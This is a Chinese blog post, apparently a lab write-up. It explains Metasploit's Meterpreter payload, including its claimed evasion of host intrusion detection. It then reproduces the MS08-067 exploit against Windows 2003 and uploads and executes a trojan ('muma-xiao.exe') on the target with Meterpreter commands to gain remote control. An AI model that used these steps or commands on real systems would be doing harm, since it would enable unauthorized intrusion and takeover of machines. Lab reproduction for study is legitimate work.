码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • meterpreter后期攻击使用方法


    Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpretershell的链接。Meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。

    今天复现一个windows 2003的漏洞,代号为ms08-067
    使用工具:Kali 、msfconsole、pcshare、windows 2003
    具体步骤如下。

    ## 1.kali系统进入msfconsole

    ## 2.搜索病毒代号输入search ms08-067


    3.设置被攻击者的ip,也就是win2003的ip地址




    4.开始攻击,显示攻击成功

    5.回到物理主机制造木马,同时上传到被攻击电脑windows 2003 1. c盘




    6.输入以下命令将木马文件上传到被攻击者的电脑C盘,然后运行,具体看下面图片

    upload //root//muma-xiao.exe c:\muma-xiao.exe
    execute -f c://muma-xiao.exe

    总结:以上操作完毕后,win2003的c盘里就有了木马,名称为muma-xiao.exe,kali远程执行木马后,然后打开pcshare工具,即可以在图形化界面操控windows2003电脑

  • 相关阅读:
    HttpClient 在vivo内销浏览器的高并发实践优化
    代码随想录算法训练营第51天|309. 买卖股票的最佳时机含冷冻期,714. 买卖股票的最佳时机含手续费,股票问题总结
    [职场] Android是什么?Android行业有哪些- #媒体#经验分享
    Vue3中插槽(slot)用法汇总
    Linux内核分析(一)--内核架构和子系统
    大聪明教你学Java | 在支付模块中如何防止掉单和重复支付
    网络流行简笔画图片大全,互联网图标简笔画
    1031 Hello World for U
    RT-DETR算法改进:最新Inner-IoU损失函数,辅助边界框回归的IoU损失,提升RT-DETR检测器精度
    2024年经典【自动化面试题】附答案
  • 原文地址:https://www.cnblogs.com/luuxiaoming/p/16585408.html
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号